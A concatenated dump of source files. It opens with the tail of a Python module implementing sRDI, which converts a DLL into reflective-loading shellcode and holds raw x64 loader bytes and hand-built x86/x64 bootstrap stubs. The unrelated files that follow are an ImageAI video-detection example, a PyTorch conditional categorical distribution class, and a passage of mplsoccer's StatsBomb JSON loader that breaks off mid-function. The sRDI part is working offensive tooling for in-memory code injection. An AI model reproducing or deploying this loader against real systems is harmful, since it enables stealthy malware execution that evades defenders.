b'\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x56\xFF\xFF\xFF\x48\x8B\x7D\x30\x4C\x8B\x6D' \
b'\xD0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xA9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49' \
b'\x83\xC7\x04\x4C\x03\xFB\x45\x33\xE4\x41\x8B\x07\x85\xC0\x0F\x84\x8A\x00\x00\x00\x8B\xC8' \
b'\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C' \
b'\x48\x03\xF3\x4C\x03\xF3\x4C\x39\x26\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7' \
b'\xC2\x33\xD2\xEB\x34\x4C\x8D\x43\x02\x49\x8B\xC4\x4C\x03\xC2\x45\x38\x20\x74\x0E\x49\x8B' \
b'\xD0\x48\xFF\xC2\x48\xFF\xC0\x44\x38\x22\x75\xF5\x4C\x89\x44\x24\x30\x48\x8D\x54\x24\x28' \
b'\x45\x33\xC0\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4C\x8B\xCE\x41\xFF\xD5\x48\x83\xC6' \
b'\x08\x49\x83\xC6\x08\x4C\x39\x26\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x49\x83\xC7\x20\xE9' \
b'\x6B\xFF\xFF\xFF\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00' \
b'\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\x0B\x01\x00\x00\x48\x03\xF7\x44\x39\x3E\x0F\x84\xEB' \
b'\x00\x00\x00\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x20\x75\x17\x0F\xBA\xE0\x1E\x72\x11' \
b'\x85\xC0\x78\x0D\x45\x8B\xC4\x44\x89\x64\x24\x20\xE9\xA4\x00\x00\x00\x85\xC9\x75\x3C\x0F' \
b'\xBA\xE0\x1E\x72\x0A\x85\xC0\x79\x06\x44\x8D\x41\x08\xEB\x68\x85\xC9\x75\x28\x0F\xBA\xE0' \
b'\x1E\x73\x0A\x85\xC0\x78\x06\x44\x8D\x41\x02\xEB\x54\x85\xC9\x75\x14\x0F\xBA\xE0\x1E\x73' \
b'\x0A\x85\xC0\x79\x06\x44\x8D\x41\x04\xEB\x40\x85\xC9\x74\x5F\x0F\xBA\xE0\x1E\x72\x0C\x85' \
b'\xC0\x78\x08\x41\xB8\x10\x00\x00\x00\xEB\x2A\x85\xC9\x74\x49\x0F\xBA\xE0\x1E\x72\x0C\x85' \
b'\xC0\x79\x08\x41\xB8\x80\x00\x00\x00\xEB\x14\x85\xC9\x74\x33\x0F\xBA\xE0\x1E\x73\x11\x85' \
b'\xC0\x78\x0D\x41\xB8\x20\x00\x00\x00\x44\x89\x44\x24\x20\xEB\x21\x85\xC9\x74\x18\x0F\xBA' \
b'\xE0\x1E\x73\x12\x44\x8B\x44\x24\x20\x85\xC0\xB9\x40\x00\x00\x00\x44\x0F\x48\xC1\xEB\xDD' \
b'\x44\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44' \
b'\x24\x20\x8B\x4E\xFC\x4C\x8D\x4C\x24\x20\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06' \
b'\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\xF8\xFE\xFF\xFF\x45\x33\xC0\x33\xD2\x48' \
b'\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48' \
b'\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48' \
b'\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00' \
b'\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1' \
b'\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28' \
b'\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x8B\xB5\xB8\x00\x00\x00\x85\xF6' \
b'\x0F\x84\x97\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x8F\x88' \
b'\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x74\x78\x44\x39\x79\x14\x74\x72\x44' \
b'\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x5D\x45\x8B' \
b'\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x52\xEB\x0D\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x4D' \
b'\x03\xC4\x41\x8A\x00\x84\xC0\x75\xEC\x41\x3B\xF2\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC' \
b'\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x22\xEB\xC3\x8B\x41\x1C\x0F\xB7\x0A\x48' \
b'\x03\xC3\x8B\x95\xC8\x00\x00\x00\x44\x8B\x04\x88\x48\x8B\x8D\xC0\x00\x00\x00\x4C\x03\xC3' \
b'\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70' \
b'\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\xCC\x48\x8B\xC4\x48\x89\x58' \
b'\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B' \
b'\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41' \
b'\x30\x4D\x85\xC0\x0F\x84\xB3\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x41\x8B\xD6' \
b'\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48' \
b'\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xD0' \
b'\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEA' \
b'\x01\x75\xE7\x4F\x8D\x14\x18\x45\x8B\xDE\x41\x8B\x7A\x20\x49\x03\xF8\x45\x39\x72\x18\x76' \
b'\x8E\x8B\x37\x41\x8B\xDE\x49\x03\xF0\x48\x8D\x7F\x04\x0F\xBE\x0E\x48\xFF\xC6\xC1\xCB\x0D' \
b'\x03\xD9\x84\xC9\x75\xF1\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC3\x45\x3B\x5A\x18\x72\xD5' \
b'\xE9\x5E\xFF\xFF\xFF\x41\x8B\x42\x24\x43\x8D\x0C\x1B\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B' \
b'\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B' \
b'\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3 '
# MARKER:E
if sRDI.is64BitDLL(dll_bytes):
rdi_shellcode = rdi_shellcode64
bootstrap = b''
bootstrap_size = 64
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dll_offset = bootstrap_size - len(bootstrap) + len(rdi_shellcode)
# pop rcx - Capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap += b'\x49\x89\xc8'
# add rcx, <Offset of the DLL>
bootstrap += b'\x48\x81\xc1'
bootstrap += struct.pack('I', dll_offset)
# mov edx, <Hash of function>
bootstrap += b'\xba'
bootstrap += struct.pack('I', function_hash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap += b'\x49\x81\xc0'
user_data_location = dll_offset + len(dll_bytes)
bootstrap += struct.pack('I', user_data_location)
# mov r9d, <Length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += struct.pack('I', len(user_data))
# push rsi - save original value
bootstrap += b'\x56'
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += struct.pack('I', flags)
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += struct.pack('b',
bootstrap_size - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
bootstrap += b'\xc3'
if len(bootstrap) != bootstrap_size:
raise Exception(f"x64 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdi_shellcode + dll_bytes + user_data
else: # 32 bit
rdi_shellcode = rdi_shellcode32
bootstrap = b''
bootstrap_size = 49
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dll_offset = bootstrap_size - len(bootstrap) + len(rdi_shellcode)
# pop eax - Capture our current location in memory
bootstrap += b'\x58'
# push ebp
bootstrap += b'\x55'
# mov ebp, esp
bootstrap += b'\x89\xe5'
# mov edx, eax - copy our location in memory to ebx before we start modifying eax
bootstrap += b'\x89\xc2'
# add eax, <Offset to the DLL>
bootstrap += b'\x05'
bootstrap += struct.pack('I', dll_offset)
# add edx, <Offset to the DLL> + <Size of DLL>
bootstrap += b'\x81\xc2'
user_data_location = dll_offset + len(dll_bytes)
bootstrap += struct.pack('I', user_data_location)
# push <Flags>
bootstrap += b'\x68'
bootstrap += struct.pack('I', flags)
# push <Length of User Data>
bootstrap += b'\x68'
bootstrap += struct.pack('I', len(user_data))
# push edx
bootstrap += b'\x52'
# push <hash of function>
bootstrap += b'\x68'
bootstrap += struct.pack('I', function_hash)
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += struct.pack('b',
bootstrap_size - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# add esp, 0x14 - remove arguments from stack (cdecl)
bootstrap += b'\x83\xc4\x14'
# leave
bootstrap += b'\xc9'
# ret - return to caller
bootstrap += b'\xc3'
if len(bootstrap) != bootstrap_size:
raise Exception(f"x86 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdi_shellcode + dll_bytes + user_data
def transform(self, target):
dll = open(target, 'rb').read()
flags = self.flags
converted = sRDI.ConvertToShellcode(dll, sRDI.HashFunctionName(self.function), self.args, flags)
return converted
def set_additional_arguments(self, **kwargs):
if "function" in kwargs['kwargs'].keys():
function = kwargs['kwargs']['function']
if function and function != "":
self.function = function
if "params" in kwargs['kwargs'].keys():
params = kwargs['kwargs']['params']
if params and params != "":
self.args = params
|
examples/custom_detection_video.py
|
vickyvava/ImageAI
| 7,141 |
85187
|
<filename>examples/custom_detection_video.py
from imageai.Detection.Custom import CustomVideoObjectDetection
import os
execution_path = os.getcwd()
video_detector = CustomVideoObjectDetection()
video_detector.setModelTypeAsYOLOv3()
video_detector.setModelPath("hololens-ex-60--loss-2.76.h5") # download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/hololens-ex-60--loss-2.76.h5
video_detector.setJsonPath("detection_config.json") # download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/detection_config.json
video_detector.loadModel()
video_detector.detectObjectsFromVideo(input_file_path="holo1.mp4",
output_file_path=os.path.join(execution_path, "holo1-detected3"),
frames_per_second=20,
minimum_percentage_probability=40,
log_progress=True)
|
survae/distributions/conditional/categorical.py
|
alisiahkoohi/survae_flows
| 262 |
85192
|
import torch
from torch.distributions import Categorical
from survae.distributions.conditional import ConditionalDistribution
from survae.utils import sum_except_batch
class ConditionalCategorical(ConditionalDistribution):
"""A Categorical distribution with conditional logits."""
def __init__(self, net):
super(ConditionalCategorical, self).__init__()
self.net = net
def cond_dist(self, context):
logits = self.net(context)
return Categorical(logits=logits)
def log_prob(self, x, context):
dist = self.cond_dist(context)
return sum_except_batch(dist.log_prob(x))
def sample(self, context):
dist = self.cond_dist(context)
return dist.sample()
def sample_with_log_prob(self, context):
dist = self.cond_dist(context)
z = dist.sample()
log_prob = dist.log_prob(z)
log_prob = sum_except_batch(log_prob)
return z, log_prob
def logits(self, context):
return self.cond_dist(context).logits
def probs(self, context):
return self.cond_dist(context).probs
def mode(self, context):
return self.cond_dist(context).logits.argmax(-1)
|
mplsoccer/statsbomb.py
|
ThomasSeidl/mplsoccer
| 157 |
85210
|
""" `mplsoccer.statsbomb` is a python module for loading StatsBomb data. """
# Authors: <NAME>, https://twitter.com/numberstorm
# License: MIT
import os
import warnings
import numpy as np
import pandas as pd
EVENT_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/events'
MATCH_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/matches'
LINEUP_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups'
COMPETITION_URL = ('https://raw.githubusercontent.com/statsbomb/open-data/'
'master/data/competitions.json')
STATSBOMB_WARNING = ('Please be responsible with Statsbomb data.'
'Register your details on https://www.statsbomb.com/resource-centre'
'and read the User Agreement carefully (on the same page).')
def _split_location_cols(df, col, new_cols):
""" Location is stored as a list. split into columns. """
for new_col in new_cols:
df[new_col] = np.nan
if col in df.columns:
mask_not_null = df[col].notnull()
df_not_null = df.loc[mask_not_null, col]
df_new = pd.DataFrame(df_not_null.tolist(), index=df_not_null.index)
new_cols = new_cols[:len(df_new.columns)] # variable whether z location is present
df_new.columns = new_cols
df.loc[mask_not_null, new_cols] = df_new
df.drop(col, axis=1, inplace=True)
def _list_dictionary_to_df(df, col, value_name, var_name, id_col='id'):
""" Some columns are a list of dictionaries. This turns them into a new dataframe of rows."""
df = df.loc[df[col].notnull(), [id_col, col]]
df.set_index(id_col, inplace=True)
df = df[col].apply(pd.Series).copy()
df.reset_index(inplace=True)
df = df.melt(id_vars=id_col, value_name=value_name, var_name=var_name)
df[var_name] = df[var_name] + 1
df = df[df[value_name].notnull()].copy()
df.reset_index(inplace=True, drop=True)
return df
def _split_dict_col(df, col):
""" Function to split a dictionary column to separate columns."""
# handle missing data by filling with an empty dictionary
df[col] = df[col].apply(lambda x: {} if pd.isna(x) else x)
# split the non-missing data and change the column names
df_temp_cols = pd.json_normalize(df[col]).set_index(df.index)
col_names = df_temp_cols.columns
# note add column description to column name if doesn't already contain it
col_names = [c.replace('.', '_') if c[:len(col)] == col else
(col+'_'+c).replace('.', '_') for c in col_names]
df[col_names] = df_temp_cols
# drop old column
df.drop(col, axis=1, inplace=True)
return df
def _simplify_cols_and_drop(df, col, cols=None):
""" Function to merge similar columns together and drop original columns. """
if cols is None:
cols = df.columns[df.columns.str.contains(col)]
df_melt = df[cols].melt(ignore_index=False).copy()
df_melt = df_melt[df_melt.value.notnull()].copy()
df.loc[df_melt.index, col] = df_melt.value
df.drop(cols, axis=1, errors='ignore', inplace=True)
return df
def read_event(path_or_buf, related_event_df=True, shot_freeze_frame_df=True,
tactics_lineup_df=True, warn=True):
""" Extracts individual event json and loads as a dictionary of up to
four pandas.DataFrame: ``event``, ``related event``, ``shot_freeze_frame``,
and ``tactics_lineup``.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
related_event_df : bool, default True
Whether to return a ``related_event`` Dataframe in the returned dictionary.
shot_freeze_frame_df : bool, default True
Whether to return a ``shot_freeze_frame`` in the returned dictionary.
tactics_lineup_df : bool, default True
Whether to return a ``tactics_lineup`` Dataframe in the returned dictionary.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
Dict of up to 4 pandas.DataFrame.
Dict keys: ``event``, ``related_event``, ``shot_freeze_frame``, ``tactics_lineup``.
Examples
--------
>>> from mplsoccer.statsbomb import read_event
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','events','7430.json')
>>> dict_dfs = read_event(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_event, EVENT_SLUG
>>> URL = f'{EVENT_SLUG}/7430.json'
>>> dict_dfs = read_event(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
df_dict = {}
# read as dataframe
if type(path_or_buf).__name__ == 'Response':
df = pd.read_json(path_or_buf.content, encoding='utf-8')
match_id = int(path_or_buf.url.split('/')[-1].split('.')[0])
else:
df = pd.read_json(path_or_buf, encoding='utf-8')
match_id = int(os.path.basename(path_or_buf)[:-5])
if df.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
# timestamp defaults to today's date so store as integers in seperate columns
df['timestamp_minute'] = df.timestamp.dt.minute
df['timestamp_second'] = df.timestamp.dt.second
df['timestamp_millisecond'] = (df.timestamp.dt.microsecond/1000).astype(np.int64)
df.drop('timestamp', axis=1, inplace=True)
# get match id and add to the event dataframe
df['match_id'] = match_id
# loop through the columns that are still dictionary columns
# and add them as separate cols to the dataframe
# these are nested dataframes in the docs - although dribbled_past/ pressure isn't needed here?
# also some others are needed: type, possession_team, play_pattern,
# team, tactics, player, position
dictionary_columns = ['pass', '50_50', 'bad_behaviour', 'ball_receipt', 'ball_recovery',
'block', 'carry', 'clearance', 'dribble', 'duel', 'foul_committed',
'foul_won', 'goalkeeper', 'half_end', 'half_start', 'injury_stoppage',
'interception', 'miscontrol', 'play_pattern', 'player', 'player_off',
'position', 'possession_team', 'shot', 'substitution',
'tactics', 'team', 'type']
for col in dictionary_columns:
if col in df.columns:
df = _split_dict_col(df, col)
# sort by time and reset index
df.sort_values(['minute', 'second', 'timestamp_minute',
'timestamp_second', 'timestamp_millisecond', 'possession'], inplace=True)
df.reset_index(inplace=True, drop=True)
# split location info to x, y and (z for shot) columns and drop old columns
_split_location_cols(df, 'location', ['x', 'y', 'z'])
_split_location_cols(df, 'pass_end_location', ['pass_end_x', 'pass_end_y'])
_split_location_cols(df, 'carry_end_location', ['carry_end_x', 'carry_end_y'])
_split_location_cols(df, 'shot_end_location', ['shot_end_x', 'shot_end_y', 'shot_end_z'])
_split_location_cols(df, 'goalkeeper_end_location', ['goalkeeper_end_x', 'goalkeeper_end_y'])
# replace weird * character in the type_name for ball receipt
df['type_name'] = df['type_name'].replace({'Ball Receipt*': 'Ball Receipt'})
# because some columns were contained in dictionaries they have been split into separate columns
# with different prefixes, e.g. clearance_aerial_won, pass_aerial_won, shot_aerial_won
# this combines them into one column and drops the original columns
df = _simplify_cols_and_drop(df, 'outcome_id')
df = _simplify_cols_and_drop(df, 'outcome_name')
df = _simplify_cols_and_drop(df, 'body_part_id')
df = _simplify_cols_and_drop(df, 'body_part_name')
df = _simplify_cols_and_drop(df, 'aerial_won')
df = _simplify_cols_and_drop(df, 'end_x', ['pass_end_x', 'carry_end_x',
'shot_end_x', 'goalkeeper_end_x'])
df = _simplify_cols_and_drop(df, 'end_y', ['pass_end_y', 'carry_end_y',
'shot_end_y', 'goalkeeper_end_y'])
df = _simplify_cols_and_drop(df, 'sub_type_id', ['pass_type_id', 'duel_type_id',
'goalkeeper_type_id', 'shot_type_id'])
df = _simplify_cols_and_drop(df, 'sub_type_name', ['pass_type_name', 'duel_type_name',
'goalkeeper_type_name', 'shot_type_name'])
# technique id/names are not always present so have to take this into account
technique_id_cols = ['pass_technique_id', 'goalkeeper_technique_id', 'shot_technique_id']
technique_id_cols = set(technique_id_cols).intersection(set(df.columns))
technique_name_cols = ['pass_technique_name', 'goalkeeper_technique_name',
'shot_technique_name']
technique_name_cols = set(technique_name_cols).intersection(set(df.columns))
df = _simplify_cols_and_drop(df, 'technique_id', technique_id_cols)
df = _simplify_cols_and_drop(df, 'technique_name', technique_name_cols)
# create a related events dataframe
if related_event_df:
df_related_event = _list_dictionary_to_df(df, col='related_events',
value_name='related_event',
var_name='event_related_id')
# some carries don't have the corresponding events.
# This makes sure all events are linked both ways
df_related_event.drop('event_related_id', axis=1, inplace=True)
df_related_event_reverse = df_related_event.rename({'related_event': 'id',
'id': 'related_event'}, axis=1)
df_related_event = pd.concat([df_related_event, df_related_event_reverse], sort=False)
df_related_event.drop_duplicates(inplace=True)
# and add on the type_names, index for easier lookups of how the events are related
df_event_type = df[['id', 'type_name', 'index']].copy()
df_related_event = df_related_event.merge(df_event_type, on='id',
how='left', validate='m:1')
df_event_type.rename({'id': 'related_event'}, axis=1, inplace=True)
df_related_event = df_related_event.merge(df_event_type, on='related_event',
how='left', validate='m:1',
suffixes=['', '_related'])
df_related_event.rename({'related_event': 'id_related'}, axis=1, inplace=True)
# add on match_id and add to dictionary
df_related_event['match_id'] = match_id
df_dict['related_event'] = df_related_event
# create a shot freeze frame dataframe - also splits dictionary of player details into columns
if shot_freeze_frame_df:
df_shot_freeze = _list_dictionary_to_df(df, col='shot_freeze_frame',
value_name='player', var_name='event_freeze_id')
df_shot_freeze = _split_dict_col(df_shot_freeze, 'player')
_split_location_cols(df_shot_freeze, 'player_location', ['x', 'y'])
# add on match_id and add to dictionary
df_shot_freeze['match_id'] = match_id
df_dict['shot_freeze_frame'] = df_shot_freeze
# create a tactics lineup frame dataframe
# also splits dictionary of player details into columns
if tactics_lineup_df:
df_tactic_lineup = _list_dictionary_to_df(df, col='tactics_lineup',
value_name='player', var_name='event_tactics_id')
df_tactic_lineup = _split_dict_col(df_tactic_lineup, 'player')
# add on match_id and add to dictionary
df_tactic_lineup['match_id'] = match_id
df_dict['tactics_lineup'] = df_tactic_lineup
# drop columns stored as a separate table
df.drop(['related_events', 'shot_freeze_frame', 'tactics_lineup'], axis=1, inplace=True)
# there are a few errors with through ball not always being marked in the technique name
if 'pass_through_ball' in df.columns:
df.loc[df.pass_through_ball.notnull(), 'technique_name'] = 'Through Ball'
# drop cols that are covered by other columns
# (e.g. pass technique covers through, ball, inswinging etc.)
cols_to_drop = ['pass_through_ball', 'pass_outswinging', 'pass_inswinging', 'clearance_head',
'clearance_left_foot', 'clearance_right_foot', 'pass_straight',
'clearance_other', 'goalkeeper_punched_out',
'goalkeeper_shot_saved_off_target', 'shot_saved_off_target',
'goalkeeper_shot_saved_to_post', 'shot_saved_to_post', 'goalkeeper_lost_out',
'goalkeeper_lost_in_play', 'goalkeeper_success_out',
'goalkeeper_success_in_play', 'goalkeeper_saved_to_post',
'shot_kick_off', 'goalkeeper_penalty_saved_to_post']
df.drop(cols_to_drop, axis=1, errors='ignore', inplace=True)
# rename end location
df.rename({'shot_end_z': 'end_z'}, axis=1, inplace=True)
# reorder columns so some of the most used ones are first
cols = ['match_id', 'id', 'index', 'period', 'timestamp_minute', 'timestamp_second',
'timestamp_millisecond', 'minute', 'second', 'type_id', 'type_name', 'sub_type_id',
'sub_type_name', 'outcome_id', 'outcome_name', 'play_pattern_id', 'play_pattern_name',
'possession_team_id', 'possession', 'possession_team_name', 'team_id', 'team_name',
'player_id', 'player_name', 'position_id',
'position_name', 'duration', 'x', 'y', 'z', 'end_x', 'end_y', 'end_z',
'body_part_id', 'body_part_name', 'technique_id', 'technique_name']
other_cols = df.columns[~df.columns.isin(cols)]
cols.extend(other_cols)
df = df[cols].copy()
# add to dictionary
df_dict['event'] = df
return df_dict
def read_match(path_or_buf, warn=True):
""" Extracts individual match json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_match
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','matches','11','1.json')
>>> df_match = read_match(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_match, MATCH_SLUG
>>> URL = f'{MATCH_SLUG}/11/1.json'
>>> df_match = read_match(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_match = pd.read_json(path_or_buf.content, convert_dates=['match_date', 'last_updated'])
else:
df_match = pd.read_json(path_or_buf, convert_dates=['match_date', 'last_updated'])
if df_match.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
# loop through the columns that are still dictionary columns
# and add them as seperate cols to the datafram
dictionary_columns = ['competition', 'season', 'home_team', 'away_team',
'metadata', 'competition_stage', 'stadium', 'referee']
for col in dictionary_columns:
if col in df_match.columns:
df_match = _split_dict_col(df_match, col)
# convert kickoff to datetime - date + kickoff time
df_match['kick_off'] = pd.to_datetime(df_match.match_date.astype(str) + ' ' + df_match.kick_off)
# drop one gender column as always equal to the other
# drop match status as always available
df_match.drop(['away_team_gender', 'match_status'], axis=1, inplace=True)
df_match.rename({'home_team_gender': 'competition_gender'}, axis=1, inplace=True)
# manager is a list (len=1) containing a dictionary so lets split into columns
if 'home_team_managers' in df_match.columns:
df_match['home_team_managers'] = df_match.home_team_managers.str[0]
df_match = _split_dict_col(df_match, 'home_team_managers')
df_match['home_team_managers_dob'] = pd.to_datetime(df_match['home_team_managers_dob'])
if 'away_team_managers' in df_match.columns:
df_match['away_team_managers'] = df_match.away_team_managers.str[0]
df_match = _split_dict_col(df_match, 'away_team_managers')
df_match['away_team_managers_dob'] = pd.to_datetime(df_match['away_team_managers_dob'])
# ids to integers
for col in ['competition_id', 'season_id', 'home_team_id', 'competition_stage_id']:
df_match[col] = df_match[col].astype(np.int64)
# sort and reset index: ready for exporting to feather
df_match.sort_values('kick_off', inplace=True)
df_match.reset_index(inplace=True, drop=True)
return df_match
def read_competition(path_or_buf, warn=True):
""" Extracts competition json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_competition
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','competitions.json')
>>> df_competition = read_competition(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_competition, COMPETITION_URL
>>> df_competition = read_competition(COMPETITION_URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_competition = pd.read_json(path_or_buf.content, convert_dates=['match_updated',
'match_available'])
else:
df_competition = pd.read_json(path_or_buf, convert_dates=['match_updated',
'match_available'])
if df_competition.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
df_competition.sort_values(['competition_id', 'season_id'], inplace=True)
df_competition.reset_index(drop=True, inplace=True)
return df_competition
def read_lineup(path_or_buf, warn=True):
""" Extracts individual lineup jsons and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_lineup
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','lineups','7430.json')
>>> df_lineup = read_lineup(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_lineup, LINEUP_SLUG
>>> URL = f'{LINEUP_SLUG}/7430.json'
>>> df_lineup = read_lineup(URL)
"""
if warn:
warnings.warn(STATSBOMB_WARNING)
if type(path_or_buf).__name__ == 'Response':
df_lineup = pd.read_json(path_or_buf.content, encoding='utf-8')
match_id = int(path_or_buf.url.split('/')[-1].split('.')[0])
else:
df_lineup = pd.read_json(path_or_buf, encoding='utf-8')
match_id = os.path.basename(path_or_buf[:-5])
if df_lineup.empty:
print(f'Skipping {path_or_buf}: empty json')
return None
df_lineup['match_id'] = match_id
# each line has a column named player that contains a list of dictionaries
# we split into seperate columns and then create a new row for each player using melt
df_lineup_players = df_lineup.lineup.apply(pd.Series)
df_lineup = df_lineup.merge(df_lineup_players, left_index=True, right_index=True)
df_lineup.drop('lineup', axis=1, inplace=True)
df_lineup = df_lineup.melt(id_vars=['team_id', 'team_name', 'match_id'], value_name='player')
df_lineup.drop('variable', axis=1, inplace=True)
df_lineup = df_lineup[df_lineup.player.notnull()].copy()
df_lineup = _split_dict_col(df_lineup, 'player')
# turn ids to integers if no missings
df_lineup['match_id'] = df_lineup.match_id.astype(np.int64)
